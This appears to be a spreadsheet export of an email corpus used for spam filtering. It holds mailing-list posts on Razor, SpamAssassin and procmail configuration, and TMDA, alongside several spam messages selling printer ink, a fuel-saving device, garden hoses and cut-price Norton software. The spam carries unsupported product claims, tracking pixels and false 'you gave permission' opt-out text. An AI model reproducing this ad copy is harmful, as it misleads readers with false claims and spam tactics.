 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6YQEDdeAu7hgvo2AKesR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="601"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#CCCCCC" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr height="18"&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#666666"&gt;&lt;img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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e443&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=61-x9HAnjLXv_a4buE_KJyITD7SLdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 12:43:39AM -0400, cmeclax po'u le cmevi'u ke'umri wrote:
 &gt; 
 &gt; I send mail detected by Razor as spam to the spamtrap, which again reports it 
 &gt; as spam. Before I added the procmail rule to revoke (as my real life account) 
 &gt; Bugtraq messages that were flagged as spam, I manually revoked them as the 
 &gt; spamtrap (which keeps the last 32 messages sent to it). Thus the spamtrap 
 &gt; both reported as spam and revoked the same message. What happens to its trust 
 &gt; rating?
 Maybe I'm the only one confused but what you are saying is that you
 have a spamtrap that receives Bugtraq messages and you are auto-
 matically reporting them as SPAM only to revoke them shortly there-
 after???  Either way automatic reporting is a Bad Thing (tm) IMHO.
 You should review and then report spamtrap or otherwise.  I'm not
 sure how this would affect your rating because I don't have any docs
 nor code to look at but I sincerely hope that if that's what you
 are doing that it negatively impacts your rating at a near exponential
 rate with every report/revoke cycle.
 &gt; Btw, what does "TeS" stand for?
 Truth Evaluation System.  UTFG.
 http://www.google.com/search?q=razor+TeS
 -steve
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] RE:Prophecies
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; That always amazes me about 'regular' dreams - how often they come true.
 &gt;
 In 1993 or so, when I was a student in Edinburgh, I had a bad dream about
 being chased around a house by a scary murderous tramp who was carrying a
 bag full of half-penny coins (which had long since ceased to be legal
 tender). The next morning as I left the flat, I found a half-penny on the
 doormat right outside our door. Fair gave me the willies, that did.
 TimC
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make your prints beautiful &amp; SAVE BIG!                 OYDQH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</si>
  <si>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&lt;title&gt;Would You Like to Save up to 80&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
 &lt;table border=3D"0" width=3D"469" height=3D"83" bgcolor=3D"#000080"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"48" align=3D"center" bordercolor=3D"#FFFF=
 FF"&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"5"&gt; Would You Like to
       &lt;b&gt; Save &lt;/b&gt;up to&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5"=
  color=3D"#FFFFCC"&gt;80%&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" s=
 ize=3D"5"&gt;
       on &lt;b&gt;Printer&lt;/b&gt;, &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D=
 "#FF3300"&gt;Fax&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"5"=
 &gt;
       &amp;amp; &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFFCC"&gt; =
 Copier&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"5"&gt; Suppl=
 ies?&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"469" height=3D"10" bordercolor=3D"#990033"&gt;
     &lt;tr&gt;
       &lt;td width=3D"53" height=3D"4" bordercolor=3D"#FFFFFF"&gt;&lt;b&gt;&lt;i&gt;&lt;font fa=
 ce=3D"Verdana" color=3D"#000099" size=3D"2"&gt;On
         Brands Like -&amp;gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"81" height=3D"4" bgcolor=3D"#000099" align=3D"center"&gt;&lt;=
 font face=3D"Tahoma" size=3D"5" color=3D"#FFFFFF"&gt;EPSON&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"74" height=3D"4" align=3D"center" bordercolor=3D"#CC000=
 0" style=3D"border-style: solid; border-width: 1" bordercolorlight=3D"#FF0=
 000" bordercolordark=3D"#CC0000"&gt;&lt;font face=3D"Palatino Linotype" size=3D"=
 4" color=3D"#CC0000"&gt;&lt;b&gt;Canon&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"76" height=3D"4" align=3D"center" bgcolor=3D"#333399"&gt;&lt;=
 i&gt;&lt;b&gt;&lt;font face=3D"Arial" color=3D"#FFFFFF" size=3D"2"&gt;HEWLETT
         PACKARD&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
       &lt;td width=3D"101" height=3D"4" bgcolor=3D"#CC0000" align=3D"center"&gt;=
 &lt;font face=3D"Book Antiqua" color=3D"#FFFFFF" size=3D"5"&gt;Lexmark&lt;/font&gt;&lt;/t=
 d&gt;
       &lt;td width=3D"46" height=3D"4" align=3D"center" bordercolor=3D"#FFFFF=
 F"&gt;&lt;b&gt;&lt;i&gt;&lt;font face=3D"Verdana" color=3D"#CC0000" size=3D"2"&gt;&amp;amp;
         more!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"469" height=3D"105"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"33" bgcolor=3D"#FFFFCC" align=3D"center=
 "&gt;&lt;font color=3D"#CC0000" face=3D"Impact" size=3D"3"&gt;100%
         Quality Satisfaction Guarantee or Your Money Back!&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"33" bgcolor=3D"#CC0000" align=3D"center=
 "&gt;&lt;font color=3D"#FFFFFF" face=3D"Impact" size=3D"3"&gt;FREE
         Same Day shipping on all US Orders*&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"33" bgcolor=3D"#000080" align=3D"center=
 "&gt;&lt;font color=3D"#FFFFCC" face=3D"Impact" size=3D"3"&gt;BEST
         Prices on the Internet - GUARANTEED!**&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"469" height=3D"38" bordercolor=3D"#000080"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"32" align=3D"center" style=3D"border: 1=
  solid #000080"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FF0000"&gt;&lt;a h=
 ref=3D"http://www.yourinkjet.com/" style=3D"color: #FF0000"&gt;Click
         Here to ORDER NOW!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"0" width=3D"465" bgcolor=3D"#000080" height=3D"14"&gt;
     &lt;tr&gt;
       &lt;td width=3D"451" align=3D"center" bordercolor=3D"#FFFFFF" height=3D=
 "10"&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;&lt;b&gt;OR
         Call us Toll-Free at 1-800-758-8084!&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"1" width=3D"463" bordercolor=3D"#000080" height=3D"44"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bordercolor=3D"#FFFFFF" height=3D"38"&gt;&lt;font color=
 =3D"#666666" size=3D"2" face=3D"Tahoma"&gt;&lt;b&gt;*Free Shipping only on
         orders of $40 or more.&lt;br&gt;**We beat any online retailer's price by=
  5%.
         Call us with the URL (Website) advertising the lower price and onc=
 e we
         verify the price, we will beat it by 5%!&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
   &lt;table border=3D"1" width=3D"463" bordercolor=3D"#000080" height=3D"77"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" bordercolor=3D"#FFFFFF" align=3D"center" height=3D=
 "71"&gt;&lt;font face=3D"Tahoma" color=3D"#666666" size=3D"1"&gt;You
         are receiving this special offer because you have provided permiss=
 ion to
         receive email communications regarding special online promotions o=
 r
         offers. If you feel you have received this message in error, or wi=
 sh to
         be removed from our subscriber list, &lt;a href=3D"http://www.yourink=
 jet.com/remove.asp" style=3D"COLOR: #ff0000"&gt;Click
         HERE&lt;/a&gt; . Thank You and we apologize for ANY inconvenience.&lt;/font=
 &gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] user_prefs ignored
</t>
  </si>
  <si>
    <t xml:space="preserve">This is just an semi-educated guess - if I'm wrong, someone please correct
 me!
 Spamd setuid's to the user running spamc. Since you're calling spamc from a
 global procmailrc file, it's being run as root (most likely). If called as
 root, spamd won't open user_prefs files.
 &gt;&gt;From the spamc man page:
        -u username
            This argument has been semi-obsoleted.  To have spamd use
            per-user-config files, run spamc as the user whose config
            files spamd should load.  If you're running spamc as some
            other user though (eg. root, mail, nobody, cyrus, etc.)
            then you can still use this flag.
 The solution is to set DROPPRIVS=yes in /etc/procmailrc, just before running
 spamc. From the procmailrc man page:
        DROPPRIVS   If set to `yes' procmail will drop all privileges
                    it might have had (suid or sgid).  This  is  only
                    useful  if  you  want  to guarantee that the bottom
                    half of the /etc/procmailrc file is executed on
                    behalf of the recipient.
 I hope that helps, and I also hope it's right!
 St-
 | -----Original Message-----
 | From: spamassassin-talk-admin@example.sourceforge.net
 | [mailto:spamassassin-talk-admin@lists.sourceforge.net]On Behalf Of
 | Cheryl L. Southard
 | Sent: Tuesday, September 24, 2002 2:28 PM
 | To: spamassassin-talk@example.sourceforge.net
 | Subject: [SAtalk] user_prefs ignored
 |
 |
 | Hi All,
 |
 | I am running SpamAssassin 2.41 with procmail as my local delivery agent
 | with sendmail.  I use spamc/spamd so that it runs site-wide from
 | /etc/procmailrc.
 |
 | spamd is run as root with the flags "-d -a -c", and spamc isn't run with
 | any flags.
 |
 | When I was testing the program, I deployed spamc from my personal
 | ~/.procmailrc file, my ~/.spamassassin/user_prefs file was read each time.
 | I can see this because I have a non-default "required_hits" value which
 | gets reported in every e-mail on the "X-Spam-Status" line.
 |
 | Now that I run spamc from the global /etc/procmailrc file, my
 | ~/.spamassassin/user_prefs file is no longer being read or processed from
 | e-mails from outside computers.  The "required_hits" value gets set back
 | to the one in /etc/mail/spamassassin/local.cf.  However, if I send local
 | e-mail, my user_prefs file is read and processed correctly.
 |
 | Does anyone know how to fix this problem?  if this is a spamassassin or
 | procmail bug?
 |
 | Thanks,
 |
 | Cheryl
 |
 | --
 | Cheryl Southard
 | cld@astro.caltech.edu
 |
 |
 | -------------------------------------------------------
 | This sf.net email is sponsored by:ThinkGeek
 | Welcome to geek heaven.
 | http://thinkgeek.com/sf
 | _______________________________________________
 | Spamassassin-talk mailing list
 | Spamassassin-talk@lists.sourceforge.net
 | https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
 |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</si>
  <si>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[SAtalk] Re: results for giant mass-check (phew)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 20 Aug 2002 11:14:50 -0700, Craig R.Hughes &lt;craig@deersoft.com&gt; writes:
 &gt; On Tuesday, August 20, 2002, at 07:23  AM, Justin Mason wrote:
 &gt; 
 `&gt; Remember that the GA is going to be considering combinatorial uses of
 &gt; the rules, so rules which look dodgy on their own might be gems for
 &gt; the GA -- perhaps something with a S/O ratio of .5 actually occurs
 &gt; often in combination with some other rule, and in those situations,
 &gt; helps to distinguish spam vs nonspam.
 &gt; 
 We're currently using a perceptron classifier. It *can't* learn
 combinations of rules.[1]
 I gave an example, assume 4 rules:
    SPAM = (A or B) and (C or D)
 It cannot learn that function.
 A decision tree classifier *can* learn that example, and the function
 above, where a .5 S/O rule is only important in certain
 circumstances. (Then again, it may be smartest to hardcode a meta-rule
 for that case, rather than trust to a naive DT learner.)
 Scott
 [1] To be fair, nor can a Bayes classifier.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</si>
  <si>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fwd:  NORTON SYSTEMWORKS CLEARANCE SALE_ONLY $29.99 7126kyiK0-697yFCQ4277rqZm-24
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E2_80E42E6E.B7623D35
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 QVRURU5USU9OOiBUaGlzIGlzIGEgTVVTVCBmb3IgQUxMIENvbXB1dGVyIFVz
 ZXJzISEhDQoNCipORVctU3BlY2lhbCBQYWNrYWdlIERlYWwhKg0KDQpOb3J0
 b24gU3lzdGVtV29ya3MgMjAwMiBTb2Z0d2FyZSBTdWl0ZSAtUHJvZmVzc2lv
 bmFsIEVkaXRpb24tDQoNCkluY2x1ZGVzIFNpeCAtIFllcyA2ISAtIEZlYXR1
 cmUtUGFja2VkIFV0aWxpdGllcw0KQUxMIEZvciAxIFNwZWNpYWwgTE9XIFBy
 aWNlIQ0KDQpUaGlzIFNvZnR3YXJlIFdpbGw6DQotIFByb3RlY3QgeW91ciBj
 b21wdXRlciBmcm9tIHVud2FudGVkIGFuZCBoYXphcmRvdXMgdmlydXNlcw0K
 LSBIZWxwIHNlY3VyZSB5b3VyIHByaXZhdGUgJiB2YWx1YWJsZSBpbmZvcm1h
 dGlvbg0KLSBBbGxvdyB5b3UgdG8gdHJhbnNmZXIgZmlsZXMgYW5kIHNlbmQg
 ZS1tYWlscyBzYWZlbHkNCi0gQmFja3VwIHlvdXIgQUxMIHlvdXIgZGF0YSBx
 dWljayBhbmQgZWFzaWx5DQotIEltcHJvdmUgeW91ciBQQydzIHBlcmZvcm1h
 bmNlIHcvc3VwZXJpb3IgaW50ZWdyYWwgZGlhZ25vc3RpY3MhDQoNCjYgRmVh
 dHVyZS1QYWNrZWQgVXRpbGl0aWVzLi4uMSBHcmVhdCBQcmljZSENCkEgJDMw
 MCsgQ29tYmluZWQgUmV0YWlsIFZhbHVlIQ0KDQpZT1VSUyBmb3IgT25seSAk
 MjkuOTkhICA8SW5jbHVkZXMgRlJFRSBTaGlwcGluZyE+DQoNCkRvbid0IGZh
 bGwgcHJleSB0byBkZXN0cnVjdGl2ZSB2aXJ1c2VzIG9yIGhhY2tlcnMhDQpQ
 cm90ZWN0ICB5b3VyIGNvbXB1dGVyIGFuZCB5b3VyIHZhbHVhYmxlIGluZm9y
 bWF0aW9uIQ0KDQoNClNvIGRvbid0IGRlbGF5Li4uZ2V0IHlvdXIgY29weSBU
 T0RBWSENCg0KDQpodHRwOi8vZXVyby5zcGVjaWFsZGlzY291bnRzNHUuY29t
 Lw0KKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKw0KVGhpcyBlbWFp
 bCBoYXMgYmVlbiBzY3JlZW5lZCBhbmQgZmlsdGVyZWQgYnkgb3VyIGluIGhv
 dXNlICIiT1BULU9VVCIiIHN5c3RlbSBpbiANCmNvbXBsaWFuY2Ugd2l0aCBz
 dGF0ZSBsYXdzLiBJZiB5b3Ugd2lzaCB0byAiT1BULU9VVCIgZnJvbSB0aGlz
 IG1haWxpbmcgYXMgd2VsbCANCmFzIHRoZSBsaXN0cyBvZiB0aG91c2FuZHMg
 IG9mIG90aGVyIGVtYWlsIHByb3ZpZGVycyBwbGVhc2UgdmlzaXQgIA0KDQpo
 dHRwOi8vZHZkLnNwZWNpYWxkaXNjb3VudHM0dS5jb20vb3B0b3V0ZC5odG1s
 DQorKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrDQoNCg0KNjYxOHVF
 QlU5LTc3NGZEVlEyMzcybDIwDQo4MjI3bDQ=
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I guess MUA-level filtering is just a fallback for people who don't have
 &gt; 1) a burning, all-consuming hatred of junk mail, 2) root access to all
 &gt; mail servers they rely on, and 3) the ability and inclination to install
 &gt; an MTA with every bell and whistle tweaked to keep out junk mail.
 Sure.  But for most people, changing their company's or ISP's server
 requires years of lobbying, while they have total and immediate
 control over their own MUA.
 That said, I agree that we should offer a good solution to
 postmasters, and I trust that your ideas are right on the mark!
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, kevin lyda wrote:
 &gt; i'm certain they already do strip after the +.  however, they'll
 &gt; have to respond to a confirm message when they send to my raw
 &gt; address.  and responding to a confirm message requires spammers to
 &gt; provide a real email address (which i can then blacklist - i've
 &gt; mapped y in mutt to whitelist; Y to blacklist) and effectively send
 &gt; the spam to each individual (which makes spamming more expensive
 &gt; bandwidthwise for the spammer).
 unfortunately, often spammers provide real return addresses - just not 
 their own.
 so if everyone used tmda, these poor unfortunates would receive
 millions of tmda confirm messages, in addition to the hundred thousand
 'undeliverable' messages that they already get..
 &gt; kevin
 regards,
 -- 
 Paul Jakma	Sys Admin	Alphyra
 	paulj@alphyra.ie
 Warning: /never/ send email to spam@dishone.st or trap@dishone.st
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Prepare to save gas driving this Summer
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;table border="3" width="83%" height="186" cellspacing="4" cellpadding="4" bordercolor="#000080"&gt;
   &lt;tr&gt;&lt;td width="100%" height="1" colspan="2" bgcolor="#FFFF00"&gt;
       &lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" face="Arial Black"&gt;&lt;img border="0" src="http://81.9.8.40/images/nozzle.jpg" align="left"&gt;&lt;/font&gt;&lt;/b&gt;&lt;p align="center"&gt;&amp;nbsp;&lt;p align="center"&gt;&lt;b&gt;&lt;font size="5" face="Arial Black"&gt;Increase
       Your Gas Mileage&lt;/font&gt;&lt;font size="5" face="Arial Black"&gt;&lt;br&gt;by up to 27%
       !!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
     &lt;td width="55%" height="99"&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;* No TOOLS
       required!&amp;nbsp;&lt;br&gt;* Improves Power&lt;img border="0" src="http://81.9.8.40/images/f-350d.gif" align="right" width="125" height="67"&gt;&lt;br&gt;* Maximizes Energy&lt;br&gt;
       * Improves Mileage&amp;nbsp;&lt;br&gt;* Improves Torque&amp;nbsp;&lt;br&gt;
       * Cleaner Engine&amp;nbsp;&lt;br&gt;* Smoother Engine&amp;nbsp;&lt;br&gt;
       * Reduces Emissions by 43%&amp;nbsp;&lt;br&gt;* Protects Catalytic Converters&amp;nbsp;&lt;br&gt;* Prevents Diesel Gelling&amp;nbsp;&lt;br&gt;
       * Improves Spark Plug Life&amp;nbsp;&lt;br&gt;* Maintenance Free&lt;br&gt;* Pays for Itself within 60 days!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;td width="45%" height="99"&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font size="4"&gt;&lt;u&gt;Installs
       in Seconds!&lt;/u&gt;&lt;/font&gt;&lt;br&gt;&lt;font size="3"&gt;A simple device that easily snaps over your fuel line.&lt;/font&gt;&amp;nbsp; Anyone can do it!&lt;br&gt;
       &lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;font size="4" face="Arial"&gt;&lt;b&gt;&lt;u&gt;Guaranteed&lt;/u&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;u&gt;!&lt;/u&gt;&lt;/font&gt;&lt;br&gt;
       &lt;font size="3"&gt;FULL REFUND if you are not satisfied with the result within THREE MONTHS from the date of purchase.&lt;/font&gt;&lt;/b&gt;
       &lt;/font&gt;&lt;/p&gt;&lt;p align="center"&gt;&lt;font face="Arial" size="3"&gt;&lt;b&gt;&lt;a href="http://81.9.8.40/cgi-bin/fuelmax/index.cgi?1100"&gt;CLICK
       HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
     &lt;td width="100%" height="99" colspan="2"&gt;
 &lt;p align="center"&gt;&lt;font size="1"&gt;&lt;font face="arial, helvetica"&gt;HOW TO
 UNSUBSCRIBE:&lt;br&gt;
 You received this e-mail because you are registered at one of our Web sites, or
 on one of our partners' sites.&lt;br&gt;
 &amp;nbsp;If you do not want to receive partner e-mail offers, or any email
 marketing from us please &lt;/font&gt;&lt;a href="http://81.9.8.40/cgi-bin/fuelmax/index.cgi?1100#remove" target="_blank"&gt;click
 here.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
  [TE^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Never be tangled up in yard work again!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;RE: CLAIM YOUR FREE STORAGE REEL &amp;amp; SPRAY GUN ($20 Value) WITH FLATHOSE!&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 .BODYCOPY {
 	font-family: Verdana, Arial, Helvetica, sans-serif;
 	font-size: 12px;
 	font-weight: normal;
 	color: #000000;
 }
 .BOLD {
 	font-family: Verdana, Arial, Helvetica, sans-serif;
 	font-size: 12px;
 	font-weight: bolder;
 	color: #000000;
 }
 .BOLDRed {
 	font-family: Verdana, Arial, Helvetica, sans-serif;
 	font-size: 12px;
 	font-weight: bolder;
 	color: #FF0000;
 }
 --&gt;
 &lt;/style&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0&gt;
 &lt;!-- ImageReady Slices (FLATHOSE-EBLAST.psd) --&gt;
 &lt;p class="BOLDRed"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;TABLE WIDTH=550 BORDER=0 align="center" CELLPADDING=0 CELLSPACING=0&gt;
   &lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_01.gif" ALT="" WIDTH=382 HEIGHT=232 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_02.gif" ALT="" WIDTH=130 HEIGHT=232 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_03.gif" ALT="" WIDTH=38 HEIGHT=232 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_04.gif" ALT="" WIDTH=382 HEIGHT=31 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_05.gif" ALT="" WIDTH=130 HEIGHT=31 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_06.gif" WIDTH=38 HEIGHT=31 ALT=""&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_07.gif" ALT="" WIDTH=382 HEIGHT=54 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD&gt; &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hFW0CCzME0D40Ep0Al"&gt;&lt;IMG SRC="http://images.consumertoday.net/images/email/flathose_1_FH1_08.gif" ALT="" WIDTH=130 HEIGHT=54 border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
